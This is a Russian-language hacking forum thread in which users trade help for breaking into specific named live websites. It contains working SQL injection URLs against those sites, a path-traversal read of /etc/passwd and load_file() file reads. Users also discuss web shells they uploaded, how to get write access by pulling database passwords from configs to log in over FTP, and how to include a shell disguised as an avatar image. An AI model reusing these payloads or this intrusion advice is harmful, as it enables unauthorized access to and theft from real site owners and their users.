Ломаю http://kataliz.net много sql, но фильтрация обламывает. при коментариев /* фильтр при -- пропискает после себя) НО при %00 выдаёт следущие. http://kataliz.net/silencers/15%27%00 Software error: HTML::Template->new() : Cannot open included file /home/katalizn/public_html/cgi-bin/Templates/Template_.tmpl : file not found. at /home/katalizn/public_html/cgi-bin/Template.pm line 1616 HTML::Template::_init_template('HTML::Template=HASH(0x82efe14)') called at /home/katalizn/public_html/cgi-bin/Template.pm line 1189 HTML::Template::_init('HTML::Template=HASH(0x82efe14)') called at /home/katalizn/public_html/cgi-bin/Template.pm line 1083 HTML::Template::new('HTML::Template', 'filename', '/home/katalizn/public_html/cgi-bin/Templates/Template_.tmpl', 'global_vars', 'on', 'die_on_bad_params', 0, 'search_path_on_include', 1, ...) called at siteengine.cgi line 116 -------------------------------------------------------------------------- Как бы обойти фильтрацию, и что эта за ошибка? в php скриптах раскритие питей на перл!? так чтоли?
tor4), при чем здесь %00? Это не комментарий. Попробуй "#". Ты же сам уже ответил себе - раскрытие пути Сам понял что сказал? Если у файла расширение php - далеко не факт, что это php скрипт. htaccess никто не отменял. Тем более, если ты внимательно прочтешь ошибку, то увидишь, что идет обращение к siteengine.cgi, а там может быть и такая ошибка. Откуда ты взял вообще перл?
Залил шелл, но все папки и файлы кромер upload read-only, chmod не меняет права доступа. Т.е. все файлы читать можно, но вот переписать, удалить или перезалить шел в другую папку не выходит. Можно ли как-то снять защиту от записи на файлах?
узнай пароль от мускула .. попробуй подключится через фтп, если получится будут все папки доступны на запись
Помогите плизз: Code: http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/* С SQL-Inj мало работал(
1. Вот: Code: http://www.freedancer.ru/?module=messages&page=comments&messageid=2095'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(concat(version(),char(58),user()))),11,12--+ 2. Постить в тему с SQL инъекциями, то что ты запостил - не следовало, это не SQL инъекция - это издевательство, да и тема та не для вопросов (ну за это ты уже словил минус). 3. Прочитай хотя бы одну статью про SQL инъекции и не смеши людей.
не через мускул, а через шелл который ты уже залил, читаешь файлы пхп смотришь конфиги для мускула. может быть тебе повезёт и пароль подойдёт к фтп.
Немного покопался я.... PHP: http://www.freedancer.ru/?module=messages&page=comments&messageid=-2095'+union+select+1,2,3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),11,12+from+cms_site_comments/* если пойти дальше, можно найти читалку файлов... PHP: http://www.freedancer.ru/?module=../../../../../../../../etc/passwd%00&cmd=list&dt=2 как видно magic_quotes_gpc = Off, что очень радует! Далее регаемся, заливаем картинку с телом шелла в автару, путь будет примерно такой: С помощью читалки ищем дырку в каком нить скрипте, где будет возможен инклуд и инклудим сам шелл.... вот и все =)
такая фигня. взломал сайт, залил туда шелл (мадшелл с99). а он не показывает некоторые файлы =/ выполнял комманду ls -la - показывает все файлы (r57 показывает все) с чем это может быть связано?
Недавно при проведении скуль-инъекции возникла такая проблема - например, когда делаешь следующий запрос www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users/* Скрипт выдает рандомное имя юзера из таблы, но стоит начать использовать лимит - www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+0,1/* или www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+1,1/* То облом - скрипт ничего не выдает И так со всеми таблицами, что можно в таком случае сделать ?
0nep@t0p limit+1+offset+1 Видел как то фильтрацию "," точнее не фильтрацию, конечно , но неадекватную реакцию на неё именно в лимите Если нет, кинь линк в ПМ посмотрим
2 jokester Нет, там точно не на запятую ибо из информэйшн схема тэиблс все норм перебиралось лимитом, а вот из других табл уже облом Линк кинул в пм
Почему load_file() иногда доказывает содержимое дерикторий а иногда нет т.е. файлы читает а содержимое дерикторий не показывает, например load_file('/home/') дира есть а он содержимое не кажит и как узнать какие диры на сервере есть чтоб знать где чего прочитать можно ответ нашел всем спасибо)
попробуй в запрос дописать +where+1=1, т.е. он будет примерно таким : www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+where+1=1+limit+1,1/*
есть читалка файлов http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+load_file(0x2f6574632f706173737764)+from+users-- помогите найти путь к конфику апача пробовал но не помогает: /etc/httpd/conf/ /etc/apache/conf/ /etc/apache/ /etc/apache2/conf/ /var/httpd/conf /var/www/conf /usr/local/apache/conf/ /usr/local/apache2/conf/ /usr/local/httpd/conf/
Перебирай. https://forum.antichat.ru/showpost.php?p=467361&postcount=1 Ес-сно без ../../../ в начале.
